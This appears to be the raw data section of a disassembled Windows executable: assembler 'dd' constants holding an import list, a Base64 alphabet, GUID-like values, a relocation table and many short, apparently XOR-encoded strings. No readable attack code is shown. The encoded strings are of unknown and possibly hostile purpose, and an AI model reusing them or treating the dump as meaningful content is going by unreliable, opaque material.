dd 0CADDDBD4h, 0B0000B00h, 0D1D5C2F3h, 0DFF6D5C4h, 0F1C4DEh
dd 2A4D0009h, 7F7E2429h, 21212963h, 0D7000900h, 0E4BEB3B0h
dd 0BBB3F9E5h, 0B00BBh, 0FACCF6BFh, 0D3DECACEh, 0FBF6EAF8h
dd 6F000E00h, 13A002Ch, 1B060106h, 6030E06h, 0C000A15h
dd 0D7FBB800h, 0CCD1D6F1h, 0D1D4D9D1h, 1000DDC2h, 98B4F700h
dd 969285B4h, 99BE9283h, 99968384h, 0F009294h, 0F6F9BA00h
dd 0FCFEF3E9h, 0E9D7D5C8h, 0D4D3C8CEh, 900DDh, 40D0E61h
dd 54F5352h, 9000D0Dh, 0B6B5DA00h, 0F4E8E9BFh, 0B6B6BEh
dd 8AA40004h, 0D0C5C0h, 0A2F0017h, 0A4C0A4Ch, 24C0A4Ch
dd 2 dup(4C0A4C0Ah), 4C014C0Ah, 16004240h, 54123700h, 2 dup(54125412h)
dd 1254121Ah, 12541254h, 42451954h, 4C000E00h, 38290Bh
dd 202D2F23h, 2A220529h, 0D000D23h, 0E8CA8D00h, 0FFE8DBF9h
dd 0E3E2E4FEh, 0CCF5C8h, 83C50014h, 91A0A9ACh, 91A0A8ACh
dd 0B6BC96AAh, 91A8A0B1h, 0A0A8ACh, 0E5A6000Fh, 0C7D6CBC9h
dd 0CFE0C3D4h, 0CFF2C3CAh, 1500C3CBh, 11337400h, 181B2200h
dd 3D111901h, 61B121Ah, 1D001519h, 351A1Bh, 327B0014h
dd 91E0F15h, 10181417h, 1E3F1F1Eh, 161E0918h, 0F151Eh
dd 96DF0014h, 0ADBAABB1h, 0B4BCB0B3h, 0B196BBBAh, 0B2BAADBCh
dd 0ABB1BAh, 31760013h, 0F250213h, 1B130205h, 13041F32h
dd 4190215h, 1200370Fh, 0E5C78000h, 0E4EFCDF4h, 0C6E5ECF5h
dd 0CEE5ECE9h, 0C1E5EDE1h, 0E5000A00h, 8B8095AAh, 809190A8h
dd 0C00A49Dh, 0EBDA9900h, 0FCEDF8FCh, 0FCEDECD4h, 900D8E1h
dd 98B4F700h, 9EB18E87h, 0B6929Bh, 185F0011h, 361B2B3Ah
dd 2D19342Ch, 2F0C3A3Ah, 1E3A3C3Eh, 0F2000C00h, 0B78697A1h
dd 809D8080h, 97969DBFh, 0E8001100h, 0AD9C8DAFh, 0AB9C8190h
dd 0BC8D8C87h, 898D9A80h, 0D008Ch, 0BFAE8CCBh, 0BDA2B98Fh
dd 0BBB29FAEh, 9008AAEh, 133C7A00h, 16391E14h, 1F0915h
dd 581E000Dh, 507A7077h, 586A667Bh, 5F7B7277h, 61000E00h
dd 50F0827h, 12130827h, 0D082715h, 0C002004h, 0C9EBAC00h
dd 0CFC5F8D8h, 0D9C3EFC7h, 0D00D8C2h, 0D3F5A700h, 0D5C2FDCBh
dd 0CAC2EAC8h, 0DED5C8h, 4F08000Dh, 715B7C6Dh, 656D7C7Bh
dd 6D65615Ch, 8F000900h, 0EEECE0C3h, 0EAFDC9E3h, 0A00EAh
dd 111D3E72h, 1E331E13h, 111D1Eh, 2076000Bh, 302041Fh
dd 4301A17h, 0C001313h, 0EAD58300h, 0E2F6F7F1h, 0EFEFC2EFh
dd 800E0ECh, 5D6A3800h, 517E5C59h, 0C005D54h, 0A381C600h
dd 0ABA392B2h, 0B2A796B6h, 120087AEh, 0C9C28500h, 0E9E4E7EAh
dd 0EAE8E0C8h, 0F1D6FCF7h, 0F6F0F1E4h, 0E9001300h, 9D859CA4h
dd 9D90AB80h, 0BE86BD8Ch, 0AA8C8D80h, 9B8881h, 0C7900013h
dd 0D3F5F4F9h, 0C4E2F1F8h, 0FCE5DDFFh, 0E9D2F9E4h, 700F5E4h
dd 8BB5E200h, 879AA78Ch, 80081h, 32352A46h, 28232A34h
dd 0B0011h, 3F2E0C4Bh, 2E27220Dh, 2E312218h, 0C8000B00h
dd 0BBA7A48Bh, 0A6A980ADh, 0ADA4ACh, 71260009h, 43524F54h
dd 434A4F60h, 0C0000E00h, 86B4A593h, 90A5ACA9h, 0B4AEA9AFh
dd 0B00B2A5h, 0C3E2A600h, 0C3D2C3CAh, 0C3CACFE0h, 0B00E7h
dd 899EAFECh, 0AA89988Dh, 0AD898085h, 0E7000C00h, 838688ABh
dd 95858EABh, 0A69E9586h, 86001000h, 0CBF2E3C1h, 0EAF3E2E9h
dd 0E8E7CEE3h, 0C7E3EAE2h, 0BB000400h, 0CBDEDEF9h, 98000A00h
dd 0ECF1E0DDh, 0FDEAF0CCh, 1200FCF9h, 78531600h, 73527B63h
dd 79627D65h, 787F4166h, 65617972h, 0E1000D00h, 858F88A7h
dd 858F88B6h, 99A4968Eh, 1000A0h, 37240256h, 373A2538h
dd 331B3322h, 31372525h, 0A0033h, 0F0F7CC9Fh, 0F1F6C8E8h
dd 0E8F0FBh, 0CE9D000Eh, 0F4CAE9F8h, 0EAF2F9F3h, 0E9E5F8C9h
dd 0E00DCh, 16073162h, 60C0B35h, 0D2E150Dh, 23050Ch, 0F3A00008h
dd 0C9F4D4C5h, 0D2C5CDh, 590A0008h, 654C7E6Fh, 797F69h
dd 0EBB8000Ch, 0F5DCD6DDh, 0D9CBCBDDh, 0F9DDDFh, 0BAE8000Eh
dd 9B818F8Dh, 0AB9A8D9Ch, 9B9B8984h, 0A00A9h, 140D2F62h
dd 0C0B3507h, 150D06h, 0D40000Bh, 21333325h, 2F022527h
dd 9000138h, 3F1C5000h, 33193431h, 113E3Fh, 4D01000Bh
dd 4265606Eh, 6E727374h, 0E004073h, 0A587C000h, 0AEA997B4h
dd 94B7AFA4h, 81B4B8A5h, 99000D00h, 0CEEDFCDEh, 0F6FDF7F0h
dd 0FAFCCBEEh, 0E00EDh, 47567433h, 575D5A64h, 5C7F445Ch
dd 72545Dh, 0EAAD0009h, 0C4FAD9C8h, 0DAC2C9C3h, 94000B00h
dd 0D9E0F1D3h, 0F5E7E7F1h, 0D5F1F3h, 61260013h, 49605243h
dd 54414354h, 42485349h, 42484F71h, 0D005149h, 50723500h
dd 54597641h, 547B4646h, 745058h, 793D0010h, 5C4D4E54h
dd 70555E49h, 5C4E4E58h, 7C585Ah, 2C68000Dh, 1A1C1B0Dh
dd 13F1107h, 1F070C06h, 0C3000E00h, 94A5A687h, 0ACA7ADAAh
dd 0ACB193B4h, 0F0082A0h, 0C9F8BB00h, 0DECFDADEh, 0DFD5D2ECh
dd 0C3FECCD4h, 0F00FAh, 4F426023h, 4D4A744Fh, 73544C47h
dd 62404C51h, 0D2000A00h, 0A0B7A1A7h, 0B6FCE0E1h, 0A00BEBEh
dd 5F592C00h, 1E1F5E49h, 40404802h, 89000F00h, 0EDD5FAACh
dd 0FCACE5EFh, 0A7BBBAF3h, 0E5E5EDh, 0FBDE000Fh, 0B8B582ADh
dd 0A4B2ABFBh, 0BAF0ECEDh, 400B2B2h, 0BAFCD900h, 80085E3h
dd 0A7D4F400h, 0BDA2A6B1h, 600B1B7h, 171D4E00h, 30B1A1Dh
dd 0B6000600h, 9BC7DDDDh, 800CEC0h, 0BBEDC800h, 0B0BCA597h
dd 0A00BDEDh, 42572400h, 574B7B47h, 4848400Ah, 10000A00h
dd 4F737663h, 743E637Fh, 4007C7Ch, 0EBAD8800h, 0C00D4B2h
dd 0A68BCF00h, 0AA88BFBCh, 0BDAE9FBBh, 0B00A2AEh, 3C0B5D00h
dd 333C342Fh, 34331429h, 0C0029h, 8093A4F2h, 869C939Bh
dd 93979EB1h, 0D0080h, 242E0457h, 32322511h, 3E252304h
dd 0E003039h, 0B993C000h, 0ACAC81B3h, 0B493A3AFh, 0A7AEA9B2h
dd 78000C00h, 191D1417h, 4A4B0C0Dh, 14141C56h, 0E0000C00h
dd 81858C8Fh, 0D2D39495h, 8C8C84CEh, 90000200h, 100B0B0h
dd 0EDC200h, 0A8C50012h, 0A9B1A6B6h, 0B1B69AB6h, 0B6B0B1A4h
dd 0F6B7A4A7h, 0E00F7h, 3E3D085Ch, 3832350Bh, 301F2B33h
dd 2F2F3Dh, 5F230001h, 91000200h, 100EDB1h, 0CFF500h, 6E4E0004h
dd 743B6Bh, 0EE920001h, 74000A00h, 3B324854h, 514E3926h
dd 0B004A01h, 0E6FADA00h, 979B889Ch, 0AFFFE09Fh, 0A00E4h
dd 0D2A8B494h, 0D1D9D5C6h, 0AAD9AEh, 400h, 0A600C800h
dd 0A500A900h, 0AD00h, 500h, 33004500h, 29002400h, 20003000h
dd 41000000h, 45444342h, 49484746h, 4D4C4B4Ah, 51504F4Eh
dd 55545352h, 59585756h, 6362615Ah, 67666564h, 6B6A6968h
dd 6F6E6D6Ch, 73727170h, 77767574h, 307A7978h, 34333231h
dd 38373635h, 2F2B39h, 2F2F3Ah, 0A0597200h, 0CFF6A89Bh
dd 42A411h, 8F0AC9A0h, 4106E039h, 0D0399AFEh, 8CA411h
dd 8F0AC9A0h, 0A715A039h, 0D0658734h, 4A9211h, 0ACC7AF20h
dd 50F25B4Dh, 0CF98B530h, 82BB11h, 0CEBD00AAh, 96B2840Bh
dd 1ABAB4B1h, 9CB610h, 1D3400AAh, 2040007h, 0
dd 0C000h, 0
dd 2C442546h, 0D026CB33h, 83B411h, 1D94FC0h, 50F21F19h
dd 0CF98B530h, 82BB11h, 0CEBD00AAh, 50F1FF0Bh, 0CF98B530h
dd 82BB11h, 0CEBD00AAh, 50F1F70Bh, 0CF98B530h, 82BB11h
dd 0CEBD00AAh, 50F2400Bh, 0CF98B530h, 82BB11h, 0CEBD00AAh
dd 2C44270Bh, 0D026CB33h, 83B411h, 1D94FC0h, 0CB690019h
dd 0CF4D9585h, 0C9611h, 0EEF4C780h, 85h, 0
dd 0C000h, 0
dd 0C166146h, 0D0CDAFD3h, 3E8A11h, 0E2C94FC0h, 6Eh, 45h dup(0)
dd 1507000h, 2 dup(0)
dd 1518400h, 150AC00h, 1508400h, 2 dup(0)
dd 151A000h, 150C000h, 12h dup(0)
dd 150E800h, 150F800h, 1511400h, 2 dup(0)
dd 1512000h, 1512C00h, 1514000h, 1514C00h, 1515800h, 1516400h
dd 1516C00h, 1517800h, 2 dup(0)
dd 150E800h, 150F800h, 1511400h, 2 dup(0)
dd 1512000h, 1512C00h, 1514000h, 1514C00h, 1515800h, 1516400h
dd 1516C00h, 1517800h, 2 dup(0)
dd 45009B00h, 50746978h, 65636F72h, 7373h, 47012400h, 6E457465h
dd 6F726976h, 6E656D6Eh, 72745374h, 73676E69h, 41h, 52027800h
dd 6E556C74h, 646E6977h, 5F008000h, 706F6466h, 6E65h, 5F014F00h
dd 6E65706Fh, 66736F5Fh, 646E6168h, 656Ch, 66020D00h, 736F6C63h
dd 65h, 5F003900h, 69786563h, 74h, 6D024E00h, 6F6C6C61h
dd 63h, 72026000h, 65736961h, 73026700h, 75627465h, 66h
dd 73027500h, 70637274h, 79h, 52454B00h, 334C454Eh, 6C642E32h
dd 6Ch, 1500000h, 2 dup(1500010h), 54524310h, 2E4C4C44h
dd 4C4C44h, 1501400h, 7 dup(1501410h), 10h, 0Dh dup(0)
dd 2000h, 0
dd 2000h, 100000h, 0C20000h, 0D00000h, 1060000h, 78h dup(0)
dd 100000h, 14800h, 8C303100h, 0FD30F330h, 13310530h, 21311931h
dd 0B6312731h, 0FC31EF31h, 0E320131h, 23321332h, 3E322932h
dd 2F32B432h, 42333533h, 5A335433h, 8A338533h, 0BB339133h
dd 0D233CC33h, 0EE33E733h, 2B341633h, 6F345434h, 0A1347634h
dd 0E834A734h, 0FC34F534h, 10350834h, 71356835h, 0A5358135h
dd 0C335BC35h, 0DB35D235h, 0E35E235h, 4A362536h, 0C5367F36h
dd 0F336CB36h, 1036F936h, 4C372737h, 81377137h, 9D379137h
dd 0B737A837h, 0A37E337h, 20381038h, 76383338h, 0B8389238h
dd 1338EA38h, 40392C39h, 6F395D39h, 0A2397639h, 0F239A839h
dd 1B3A0239h, 453A2F3Ah, 853A5C3Ah, 0BC3AB53Ah, 0EA3ADC3Ah
dd 33AFD3Ah, 653B393Bh, 793B6B3Bh, 943B7F3Bh, 0C33BB93Bh
dd 0F73BF03Bh, 373C253Bh, 653C4A3Ch, 7C3C753Ch, 0C43CA03Ch
dd 0EC3CCA3Ch, 143CF53Ch, 2F3D1E3Dh, 533D363Dh, 783D593Dh
dd 8C3D863Dh, 0AA3DA13Dh, 0CA3DB53Dh, 0DE3DD03Dh, 173DE83Dh
dd 3C3E1D3Eh, 4F3E453Eh, 693E583Eh, 803E733Eh, 9B3E863Eh
dd 0B13EA53Eh, 343EFF3Eh, 633F3A3Fh, 0A13F7A3Fh, 0BA3FA83Fh
dd 0D53FCB3Fh, 20003Fh, 28400h, 30302900h, 67305030h, 84307E30h
dd 0BC30B630h, 0F730C330h, 330FC30h, 19311331h, 4C314531h
dd 71316B31h, 0B831B331h, 0E531D131h, 0FE31F931h, 25321131h
dd 89327D32h, 0B0329C32h, 0C832B532h, 15330832h, 0C2332133h
dd 0E433D633h, 0D33F633h, 1A341434h, 2F342934h, 53344234h
dd 79345934h, 90348534h, 0BA34AB34h, 0D434C734h, 0EC34DF34h
dd 0FA34F134h, 0C350734h, 1D351135h, 28352335h, 39352D35h
dd 44353F35h, 55354935h, 60355B35h, 71356535h, 7C357735h
dd 90358135h, 9B359635h, 0AB35A535h, 0C535B035h, 0E535CC35h
dd 535EC35h, 47360C36h, 6A365836h, 85367F36h, 0A0368F36h
dd 0B236AD36h, 0C836BB36h, 0D336CD36h, 0E536DB36h, 0F036EB36h
dd 0C370436h, 26371637h, 58374137h, 6E376937h, 8F378537h
dd 0CD37C837h, 0DE37D837h, 0D37F937h, 1E381838h, 44383838h
dd 87386A38h, 9D389738h, 0D338C538h, 0FD38E838h, 11390338h
dd 38392339h, 98394939h, 0AA39A239h, 0B939B039h, 0DE39C139h
dd 0FC39F439h, 123A0139h, 243A1C3Ah, 3B3A353Ah, 513A4B3Ah
dd 633A583Ah, 893A7C3Ah, 9C3A903Ah, 0C33AA93Ah, 0D73AC93Ah
dd 0EB3AE13Ah, 0FE3AF43Ah, 0F3B093Ah, 203B1A3Bh, 2C3B263Bh
dd 3F3B383Bh, 583B4E3Bh, 0A03B933Bh, 0B13BAC3Bh, 0CE3BBD3Bh
dd 0D93BD43Bh, 0F63BE53Bh, 23BFC3Bh, 0D3C073Ch, 183C123Ch
dd 223C1D3Ch, 343C2E3Ch, 493C3E3Ch, 543C4E3Ch, 5F3C593Ch
dd 6A3C643Ch, 753C6F3Ch, 883C7A3Ch, 993C933Ch, 0A83CA13Ch
dd 0C13CB63Ch, 0CD3CC63Ch, 0E23CDB3Ch, 0EF3CE73Ch, 0C3CF43Ch
dd 2D3D233Dh, 543D4E3Dh, 683D593Dh, 743D6E3Dh, 943D7B3Dh
dd 0AD3DA03Dh, 0C83DB53Dh, 0E03DCD3Dh, 0F23DED3Dh, 83DFB3Dh
dd 123E0D3Eh, 243E1E3Eh, 2E3E293Eh, 403E3A3Eh, 4A3E453Eh
dd 5C3E563Eh, 663E613Eh, 783E723Eh, 823E7D3Eh, 943E8E3Eh
dd 9E3E993Eh, 0B03EAA3Eh, 0BA3EB53Eh, 0CC3EC63Eh, 0D63ED13Eh
dd 0E83EE23Eh, 0F23EED3Eh, 43EFE3Eh, 0E3F093Fh, 203F1A3Fh
dd 2A3F253Fh, 3C3F363Fh, 463F413Fh, 583F523Fh, 623F5D3Fh
dd 743F6E3Fh, 7E3F793Fh, 903F8A3Fh, 9A3F953Fh, 0AC3FA63Fh
dd 0B63FB13Fh, 0C83FC23Fh, 0D23FCD3Fh, 0E43FDE3Fh, 0EE3FE93Fh
dd 3FFA3Fh, 300000h, 29000h, 5300000h, 16300A30h, 21301C30h
dd 32302630h, 3D303830h, 4E304230h, 59305430h, 6A305E30h
dd 75307030h, 86307A30h, 91308C30h, 0A2309630h, 0AD30A830h
dd 0BE30B230h, 0C930C430h, 0DD30CE30h, 0E830E330h, 730FF30h
dd 19311331h, 23311E31h, 35312F31h, 3F313A31h, 51314B31h
dd 5B315631h, 6D316731h, 77317231h, 89318331h, 93318E31h
dd 0A5319F31h, 0AF31AA31h, 0C131BB31h, 0CB31C631h, 0DD31D731h
dd 0E731E231h, 0F931F331h, 331FE31h, 15320F32h, 1F321A32h
dd 31322B32h, 3B323632h, 4D324732h, 57325232h, 69326332h
dd 73326E32h, 85327F32h, 8F328A32h, 0A1329B32h, 0AB32A632h
dd 0BD32B732h, 0C732C232h, 0D932D332h, 0E332DE32h, 0F532EF32h
dd 0FF32FA32h, 11330B32h, 1B331633h, 2D332733h, 37333233h
dd 49334333h, 53334E33h, 65335F33h, 6F336A33h, 81337B33h
dd 8B338633h, 9D339733h, 0A733A233h, 0B933B333h, 0C333BE33h
dd 0D533CF33h, 0DF33DA33h, 0F133EB33h, 0FB33F633h, 0D340733h
dd 17341234h, 29342334h, 33342E34h, 45343F34h, 4F344A34h
dd 61345B34h, 6B346634h, 7D347734h, 87348234h, 99349334h
dd 0A3349E34h, 0B534AF34h, 0BF34BA34h, 0D134CB34h, 0DB34D634h
dd 0ED34E734h, 0F734F234h, 9350334h, 13350E35h, 25351F35h
dd 2F352A35h, 41353B35h, 4B354635h, 5D355735h, 67356235h
dd 79357335h, 83357E35h, 95358F35h, 9F359A35h, 0B735B135h
dd 0D535BC35h, 0E735DB35h, 0C35F035h, 25361336h, 51362B36h
dd 80367536h, 0BF36B936h, 4336FA36h, 64374937h, 0A837A037h
dd 0C237BC37h, 0EC37E537h, 7380137h, 23381A38h, 6B383D38h
dd 0A1389B38h, 0C038AD38h, 0E738D338h, 138FB38h, 13390639h
dd 1E391939h, 31392B39h, 43393639h, 4E394939h, 8E398639h
dd 9A399439h, 0C239AD39h, 0D639CF39h, 0D39FA39h, 673A323Ah
dd 0B13AAA3Ah, 0E03AC73Ah, 0D3AE63Ah, 383B133Bh, 993B3E3Bh
dd 0A3BF33Bh, 2E3C173Ch, 583C413Ch, 883C823Ch, 0ED3CBC3Ch
dd 2E3D243Ch, 793D4E3Dh, 923D7F3Dh, 0D83DCE3Dh, 653E143Dh
dd 733E6D3Eh, 873E803Eh, 9A3E943Eh, 0B63EA83Eh, 0CD3EBD3Eh
dd 0ED3EDB3Eh, 23EF43Eh, 183F0E3Fh, 2A3F233Fh, 643F353Fh
dd 7A3F6B3Fh, 0A93F8C3Fh, 0C63FB23Fh, 3FD33Fh, 400000h
dd 1F000h, 2F302900h, 0A9309E30h, 0CA30C430h, 0FE30F630h
dd 61315530h, 76317031h, 0C3317D31h, 0EF31E931h, 26320731h
dd 33322E32h, 3E323932h, 56324532h, 77325D32h, 93328C32h
dd 0B2329B32h, 0C832BE32h, 0D532CE32h, 0E432DD32h, 932EA32h
dd 31331E33h, 57334133h, 86337A33h, 0B1339533h, 0CE33C333h
dd 0E033DB33h, 0F633E933h, 33FB33h, 12340C34h, 1C341734h
dd 2E342834h, 38343334h, 4A344434h, 54344F34h, 66346034h
dd 70346B34h, 85347F34h, 98348A34h, 0C234B534h, 0D034C734h
dd 0E234DD34h, 0F334E734h, 0FE34F934h, 12350334h, 1D351835h
dd 4E353435h, 80356235h, 90358A35h, 0A3359735h, 0B735AA35h
dd 0CD35C735h, 635F235h, 39363036h, 4F364536h, 62365536h
dd 6F366936h, 8A368336h, 0B4369536h, 0DA36D436h, 0FE36EB36h
dd 17370A36h, 2F372037h, 46373B37h, 62375237h, 80376C37h
dd 95378F37h, 0B437AD37h, 0DC37C137h, 437E237h, 32381038h
dd 46383C38h, 64384C38h, 94386B38h, 0AA389D38h, 0BB38B438h
dd 0CF38C238h, 0E038DA38h, 0F738F138h, 37393238h, 48394239h
dd 9B396239h, 0BF39AC39h, 0D839D339h, 0F539EB39h, 1739FB39h
dd 3D3A2D3Ah, 543A4D3Ah, 643A5D3Ah, 853A703Ah, 0A33A8D3Ah
dd 0C53ABA3Ah, 0E63ACC3Ah, 0FF3AF93Ah, 1C3B103Ah, 4A3B2E3Bh
dd 5B3B553Bh, 0A73B923Bh, 0C43BBD3Bh, 0E63BD13Bh, 0FB3BF23Bh
dd 0B3C053Bh, 2E3C213Ch, 433C3A3Ch, 553C4C3Ch
dd 773C663Ch, 903C7D3Ch, 0ED3CD03Ch, 3E3D2A3Ch, 0C23D5B3Dh
dd 0D93DC93Dh, 0F33DE03Dh, 63DF93Dh, 253E0D3Eh, 593E4C3Eh
dd 0A53E5E3Eh, 0B83EAB3Eh, 0DF3EBE3Eh, 93EF83Eh, 373F213Fh
dd 993F933Fh, 0B63FAF3Fh, 0DC3FCE3Fh, 0FB3FE33Fh, 50003Fh
dd 21800h, 1F300900h, 41302E30h, 4D304630h, 97308730h
dd 0AF30A130h, 0C730B830h, 0DC30D130h, 0FB30EE30h, 1A310730h
dd 2E312131h, 40313731h, 55314A31h, 68315E31h, 0B3316D31h
dd 0BE31B931h, 0D531C831h, 0E331DA31h, 0F531F031h, 631FA31h
dd 11320C32h, 22321632h, 2D322832h, 3E323232h, 49324432h
dd 5D324E32h, 68326332h, 7D327032h, 8B328232h, 9D329832h
dd 0AF32A232h, 0BA32B532h, 0F732EE32h, 1B330932h, 3D332833h
dd 5A335133h, 95336833h, 0B133A733h, 0DD33B733h, 0F633E433h
dd 22341733h, 50344334h, 64345E34h, 75347034h, 99347B34h
dd 0B934A034h, 0D934C034h, 1334E034h, 21351B35h, 32352735h
dd 60353935h, 6D356735h, 0A1357235h, 0B035AA35h, 0C435BB35h
dd 0D835CB35h, 135DE35h, 36360E36h, 53363C36h, 6F366936h
dd 95368E36h, 0F636AD36h, 1A36FC36h, 37373037h, 8B378237h
dd 0E437A037h, 0FF37F837h, 24381837h, 53383D38h, 79385F38h
dd 0B638AF38h, 0E138D638h, 0F438ED38h, 47391038h, 70396239h
dd 88398239h, 0B539A539h, 0CD39BE39h, 0EE39DB39h, 1439F939h
dd 253A1E3Ah, 4E3A313Ah, 6E3A5A3Ah, 8F3A753Ah, 0BD3A9D3Ah
dd 0D33ACC3Ah, 0F73AE93Ah, 173AFC3Ah, 283B223Bh, 483B3F3Bh
dd 673B573Bh, 8B3B733Bh, 9C3B963Bh, 0AF3BA93Bh, 0C33BB63Bh
dd 233BE73Bh, 0D13C9B3Ch, 0E63CD83Ch, 0FA3CED3Ch, 0E3D083Ch
dd 2A3D213Dh, 3B3D353Dh, 523D4B3Dh, 693D633Dh, 7E3D783Dh
dd 993D893Dh, 0B03DA73Dh, 0C83DB93Dh, 0DD3DCE3Dh, 0F03DE33Dh
dd 43DF63Dh, 1D3E103Eh, 363E2A3Eh, 4D3E413Eh, 663E563Eh
dd 763E6F3Eh, 813E7C3Eh, 0A63E9D3Eh, 0B53EAD3Eh, 0C23EBA3Eh
dd 0D83ECE3Eh, 0F23EE63Eh, 0D3F073Eh, 253F143Fh, 3C3F2D3Fh
dd 523F4C3Fh, 6C3F653Fh, 973F883Fh, 0AF3F9E3Fh, 0BF3FB63Fh
dd 0D03FC63Fh, 0E83FD63Fh, 0FF3FF03Fh, 60003Fh, 1C000h
dd 19300C00h, 39303330h, 4B303F30h, 71306A30h, 0AE308630h
dd 0C030B430h, 0E430D630h, 0FC30F630h, 11310830h, 53312E31h
dd 76316031h, 9D318331h, 0C331A431h, 0E931CE31h, 631FF31h
dd 26321A32h, 3A322B32h, 71324C32h, 0B5327D32h, 0E932D132h
dd 732EF32h, 25330D33h, 43332B33h, 73336D33h, 90338A33h
dd 0A3339A33h, 0B233A833h, 0C033B733h, 0E133CB33h, 0FD33F133h
dd 19340433h, 43342D34h, 78346634h, 9B349434h, 0C834AD34h
dd 0FE34DA34h, 28350434h, 40352E35h, 60355A35h, 8E357235h
dd 0A7359535h, 0DB35D235h, 335E235h, 43361E36h, 5C365536h
dd 74366436h, 0BB368F36h, 0E036D536h, 0F736E636h, 136FC36h
dd 10370A37h, 2B371737h, 44373837h, 5F374B37h, 98376637h
dd 0AD37A737h, 0D537C137h, 0EB37DC37h, 1137FD37h, 6B382138h
dd 9C387D38h, 0B638A538h, 0C838BC38h, 0F838D438h, 1C390938h
dd 35393039h, 5D394839h, 83397339h, 0AF39A839h, 0EA39CC39h
dd 3139F039h, 543A373Ah, 0BC3A5C3Ah, 3AC43Ah, 273B063Bh
dd 513B403Bh, 803B573Bh, 0D73BC93Bh, 0A3BE83Bh, 223C163Ch
dd 7D3C6C3Ch, 0A33C8F3Ch, 0BE3CAA3Ch, 0D63CD03Ch, 0FC3CEA3Ch
dd 173D033Ch, 313D2B3Dh, 4E3D473Dh, 683D623Dh, 883D7E3Dh
dd 0B23D9E3Dh, 0CF3DB93Dh, 0EA3DD83Dh, 103DF03Dh, 373E183Eh
dd 473E3E3Eh, 5B3E4D3Eh, 7D3E623Eh, 0A33E843Eh, 0BB3EB13Eh
dd 0CF3EC73Eh, 0F03EEA3Eh, 143EF73Eh, 323F1A3Fh, 493F413Fh
dd 6A3F513Fh, 7C3F733Fh, 0AD3F853Fh, 0C63FB23Fh, 0FA3FDE3Fh
dd 70003Fh, 25000h, 39302300h, 52303F30h, 65305A30h, 0A8309D30h
dd 0DC30C430h, 0F530EF30h, 0D310430h, 2E312731h, 5C314031h
dd 74316331h, 0AF318431h, 0CD31B631h, 0F131D331h, 131F731h
dd 1C320C32h, 4E324732h, 6E325432h, 80327932h, 0AB328E32h
dd 0CA32B332h, 0D932D332h, 0EB32E432h, 432FB32h, 12330B33h
dd 22331B33h, 3E333933h, 6D334E33h, 80337933h, 0A1339433h
dd 0B533A833h, 0D533BC33h, 0E533DB33h, 233FD33h, 2B341134h
dd 64344334h, 94346934h, 0AA349A34h, 0BB34B434h, 0DE34D834h
dd 0FF34E834h, 13350834h, 29352335h, 38353235h, 47354135h
dd 5A355035h, 76357135h, 0B1358635h, 0C335B735h, 0D435CA35h
dd 0E835DE35h, 0B35EE35h, 1B361136h, 38363336h, 76364836h
dd 89367C36h, 99369236h, 0A936A236h, 0CE36C836h, 0F036D836h
dd 0FD36F736h, 2C371136h, 41373A37h, 66376037h, 7E376B37h
dd 0A2379137h, 0C537A837h, 0E037CB37h, 37F037h, 31382B38h
dd 42383C38h, 57384D38h, 91387938h, 0B5389638h, 0C038BB38h
dd 0FB38D038h, 13390238h, 3F391E39h, 52394639h, 6E396939h
dd 0AC397E39h, 0B939B339h, 0D139C439h, 0E339DD39h, 0F939ED39h
dd 203A1639h, 563A383Ah, 783A5C3Ah, 8B3A7E3Ah, 0A63A903Ah
dd 0C83AAC3Ah, 0DB3ACE3Ah, 0F63AE03Ah, 183AFC3Ah, 2B3B1E3Bh
dd 463B303Bh, 683B4C3Bh, 7B3B6E3Bh, 963B803Bh, 0B03B9C3Bh
dd 0C33BB63Bh, 0D23BC93Bh, 0DF3BD93Bh, 13BE43Bh, 693C5B3Ch
dd 793C6F3Ch, 923C863Ch, 0AC3C9C3Ch, 0D63CBC3Ch, 0EE3CE73Ch
dd 93CFE3Ch, 283D0F3Dh, 493D3C3Dh, 593D4F3Dh, 683D613Dh
dd 893D793Dh, 0A83D993Dh, 0BD3DB73Dh, 0CF3DC83Dh, 0E63DE13Dh
dd 83DF63Dh, 193E0E3Eh, 303E233Eh, 533E453Eh, 733E583Eh
dd 8C3E7E3Eh, 9A3E923Eh, 0A93EA33Eh, 0C13EB53Eh, 0D23EC73Eh
dd 0DD3ED73Eh, 0F03EE93Eh, 143F0A3Eh, 243F1B3Fh, 4F3F343Fh
dd 5A3F553Fh, 713F643Fh, 7F3F763Fh, 913F8C3Fh, 0A23F963Fh
dd 0AD3FA83Fh, 0BE3FB23Fh, 0C93FC43Fh, 0DA3FCE3Fh, 0E53FE03Fh
dd 0F63FEA3Fh, 3FFC3Fh, 800000h, 1FC00h, 6300100h, 18301230h
dd 22301D30h, 34302E30h, 3E303930h, 50304A30h, 5A305530h
dd 6C306630h, 76307130h, 88308230h, 92308D30h, 0A4309E30h
dd 0AE30A930h, 0C030BA30h, 0CA30C530h, 0DC30D630h, 0E630E130h
dd 0F830F230h, 230FD30h, 17311131h, 4B311C31h, 63315B31h
dd 0BB31AD31h, 0D931C831h, 0EE31E631h, 21321331h, 31322632h
dd 64325F32h, 8B327D32h, 0A5329E32h, 0C432B632h, 0D632C932h
dd 0F532E532h, 48332F32h, 69335E33h, 76337033h, 0C533A533h
dd 0E933D633h, 933FE33h, 28341034h, 3A343434h, 4C344734h
dd 66345F34h, 83347634h, 99349234h, 534D034h, 27351F35h
dd 67355635h, 82357B35h, 0AA359235h, 0C235B035h, 0D235CB35h
dd 0F435D935h, 10360535h, 46362336h, 5D364D36h, 93367136h
dd 0B636B036h, 0FA36C336h, 1E371736h, 42373B37h, 73375A37h
dd 81377B37h, 91378737h, 0C337AD37h, 0D937D337h, 37DE37h
dd 23381A38h, 34382E38h, 48383D38h, 75384E38h, 81387A38h
dd 0C438BF38h, 0DF38D738h, 2338E538h, 48394239h, 78396239h
dd 8F397F39h, 0B5399539h, 0D139C639h, 3339E039h, 623A4C3Ah
dd 813A683Ah, 9D3A973Ah, 0B93AA83Ah, 0DA3AC13Ah, 0ED3AE73Ah
dd 43AFA3Ah, 343B2E3Bh, 483B3B3Bh, 6C3B4E3Bh, 953B8F3Bh
dd 0A03B9A3Bh, 0B53BAE3Bh, 0C73BC13Bh, 0EA3BD63Bh, 0FA3BF03Bh
dd 213C0D3Bh, 4A3C443Ch, 5D3C4F3Ch, 753C693Ch, 8A3C7B3Ch
dd 0A43C9E3Ch, 0C13CAE3Ch, 0F83CD53Ch, 53CFE3Ch, 193D133Dh
dd 4C3D3A3Dh, 9F3D523Dh, 193DA53Dh, 5C3E503Eh, 713E613Eh
dd 913E7D3Eh, 0B53E963Eh, 0CF3EBB3Eh, 0DF3ED53Eh, 63EF23Eh
